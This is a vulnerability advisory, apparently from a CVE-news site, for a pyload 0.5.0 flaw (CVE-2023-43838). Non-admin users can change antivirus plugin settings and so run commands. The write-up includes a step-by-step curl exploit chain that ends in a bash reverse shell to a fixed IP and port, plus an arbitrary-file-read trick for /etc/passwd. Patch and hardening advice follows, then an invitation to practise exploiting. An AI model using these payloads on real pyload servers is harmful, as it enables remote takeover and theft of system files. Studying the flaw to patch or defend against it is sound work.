Listen to this Post
How CVE-2023-43838 works:
The vulnerability stems from inconsistent application of ADMIN_ONLY_OPTIONS. In pyload core, a set of security-critical configuration options (reconnect scripts, SSL certificates, proxy credentials) is marked admin-only via the ADMIN_ONLY_OPTIONS set. When a user calls set_config_value for a core option (e.g., “reconnect.script”), the code checks if the user is admin; otherwise it raises PermissionError. However, this check is completely skipped for plugin configuration options. The AntiVirus plugin defines an executable path called “avfile” and arguments “avargs”. A non-admin user with only the SETTINGS permission can modify these plugin options via the same API endpoint because no admin validation occurs. Later, when the AntiVirus plugin scans a downloaded file, it passes the user-controlled “avfile” and “avargs” directly to subprocess.Popen(), resulting in arbitrary command execution. The attacker first sets avfile to /bin/bash and avargs to a reverse shell command. Then they enable the plugin and trigger a download. Upon completion, the scan_file() method executes the payload, giving the attacker a reverse shell with the privileges of the pyload process. Additionally, a separate arbitrary file read exists via storage_folder: setting it to “/” bypasses inverted path validation, allowing access to any system file through /files/get/ endpoints.
dailycve form:
Platform: pyload
Version: 0.5.0
Vulnerability: Plugin RCE
Severity: Critical
date: 2023-09-27
Prediction: Patch 2023-10-11
What Undercode Say:
Enumerate if SETTINGS permission is present curl -b cookie http://TARGET:8000/api/get_user_permissions Set malicious avfile (requires SETTINGS) curl -b cookie -X POST http://TARGET:8000/api/set_config_value -d 'section=plugin' -d 'option=AntiVirus.avfile' -d 'value=/bin/bash' Set avargs for reverse shell curl -b cookie -X POST http://TARGET:8000/api/set_config_value -d 'section=plugin' -d 'option=AntiVirus.avargs' -d 'value=-c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' Activate AntiVirus plugin curl -b cookie -X POST http://TARGET:8000/api/set_config_value -d 'section=plugin' -d 'option=AntiVirus.activated' -d 'value=True' Trigger download to execute payload curl -b cookie -X POST http://TARGET:8000/api/add_package -d 'name=exploit' -d 'links=http://example.com/file.zip'
Exploit:
- Authenticate as non-admin user with SETTINGS and DOWNLOAD permissions.
- Modify AntiVirus.avfile and AntiVirus.avargs via /api/set_config_value (plugin section, no admin check).
3. Enable AntiVirus plugin via same API.
- Add any downloadable package; when download completes, scan_file() calls subprocess.Popen([“/bin/bash”, “-c …”]).
- Receive reverse shell. Also, set storage_folder=”/” and request /files/get/etc/passwd for file read.
Protection from this CVE:
- Upgrade to pyload version 0.5.1 or later where plugin options are also subject to ADMIN_ONLY_OPTIONS checks.
- If patching not possible, manually enforce admin validation for plugin options in core/api/init.py (lines 271-272).
- Restrict SETTINGS permission to trusted admins only.
- Validate avfile path against a whitelist of known antivirus binaries before subprocess.Popen().
- Use chroot or containerization to limit filesystem access from storage_folder manipulation.
Impact:
- Remote Code Execution (RCE) allowing full system compromise.
- Privilege escalation from non-admin SETTINGS user to pyload process user (often root or high-privilege).
- Arbitrary file read exposing sensitive system files (/etc/passwd, configs, SSH keys).
- Potential lateral movement or data theft.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

